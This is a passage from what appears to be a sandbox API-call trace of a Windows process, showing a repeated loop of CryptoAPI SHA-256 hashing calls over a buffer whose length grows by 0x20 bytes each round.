	[0214.634] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734a60, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734a60, pdwDataLen=0x128ba4) returned 1
	[0214.634] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.634] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.634] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.634] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.634] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0214.634] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.634] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734a88
	[0214.635] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734a88, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734a88, pdwDataLen=0x128ba4) returned 1
	[0214.635] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.635] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.635] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.635] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.635] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0214.635] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.635] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734ab0
	[0214.635] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734ab0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734ab0, pdwDataLen=0x128ba4) returned 1
	[0214.635] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.635] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.635] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.636] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.636] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0214.636] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.636] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734ad8
	[0214.636] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734ad8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734ad8, pdwDataLen=0x128ba4) returned 1
	[0214.636] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.636] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.636] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.636] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.636] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0214.636] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.636] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734b00
	[0214.636] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734b00, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734b00, pdwDataLen=0x128ba4) returned 1
	[0214.636] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.636] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.636] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.637] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.637] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0214.637] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.637] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734b28
	[0214.637] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734b28, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734b28, pdwDataLen=0x128ba4) returned 1
	[0214.637] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.637] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.637] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.637] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.637] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0214.637] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.637] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734b50
	[0214.637] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734b50, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734b50, pdwDataLen=0x128ba4) returned 1
	[0214.637] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.637] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.637] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.638] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.638] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0214.638] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.638] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734b78
	[0214.638] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734b78, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734b78, pdwDataLen=0x128ba4) returned 1
	[0214.638] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.638] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.638] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.638] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.638] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0214.638] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.638] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734ba0
	[0214.638] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734ba0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734ba0, pdwDataLen=0x128ba4) returned 1
	[0214.638] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.638] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.638] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.639] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.639] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0214.639] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.639] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734bc8
	[0214.639] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734bc8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734bc8, pdwDataLen=0x128ba4) returned 1
	[0214.639] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.639] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.639] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.639] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.639] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0214.639] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.639] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734bf0
	[0214.639] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734bf0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734bf0, pdwDataLen=0x128ba4) returned 1
	[0214.639] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.639] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.639] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.640] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.640] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0214.640] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.640] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734c18
	[0214.640] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734c18, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734c18, pdwDataLen=0x128ba4) returned 1
	[0214.640] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.640] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.640] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.640] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.640] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0214.640] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.640] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734c40
	[0214.640] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734c40, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734c40, pdwDataLen=0x128ba4) returned 1
	[0214.641] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.641] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.641] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.642] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.642] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0214.642] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.642] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734c68
	[0214.642] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734c68, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734c68, pdwDataLen=0x128ba4) returned 1
	[0214.642] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.642] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.642] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.642] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.642] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0214.642] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.642] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734c90
	[0214.642] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734c90, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734c90, pdwDataLen=0x128ba4) returned 1
	[0214.642] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.642] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.642] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.643] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.643] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0214.643] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.643] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734cb8
	[0214.643] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734cb8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734cb8, pdwDataLen=0x128ba4) returned 1
	[0214.643] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.643] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.643] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.643] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.643] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0214.643] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.643] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734ce0
	[0214.643] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734ce0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734ce0, pdwDataLen=0x128ba4) returned 1
	[0214.643] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.643] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.644] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.644] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.644] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0214.644] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.644] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734d08
	[0214.644] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734d08, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734d08, pdwDataLen=0x128ba4) returned 1
	[0214.644] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.644] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.644] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.644] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.644] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0214.645] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.645] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734d30
	[0214.645] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734d30, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734d30, pdwDataLen=0x128ba4) returned 1
	[0214.645] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.645] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.645] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.645] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.645] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0214.645] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.645] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734d58
	[0214.645] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734d58, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734d58, pdwDataLen=0x128ba4) returned 1
	[0214.645] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.645] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.645] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.646] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.646] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0214.646] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.646] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734d80
	[0214.646] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734d80, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734d80, pdwDataLen=0x128ba4) returned 1
	[0214.646] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.646] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.646] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.646] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.646] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0214.646] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.646] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734da8
	[0214.646] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734da8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734da8, pdwDataLen=0x128ba4) returned 1
	[0214.646] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.646] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.646] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.647] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.647] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0214.647] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.647] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734dd0
	[0214.647] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734dd0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734dd0, pdwDataLen=0x128ba4) returned 1
	[0214.647] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.647] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.647] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.647] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.647] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0214.647] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.647] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734df8
	[0214.647] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734df8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734df8, pdwDataLen=0x128ba4) returned 1
	[0214.647] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.647] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.647] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.648] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.648] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0214.648] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.648] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734e20
	[0214.648] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734e20, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734e20, pdwDataLen=0x128ba4) returned 1
	[0214.648] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.648] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.648] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.648] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.648] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0214.648] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.648] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734e48
	[0214.648] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734e48, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734e48, pdwDataLen=0x128ba4) returned 1
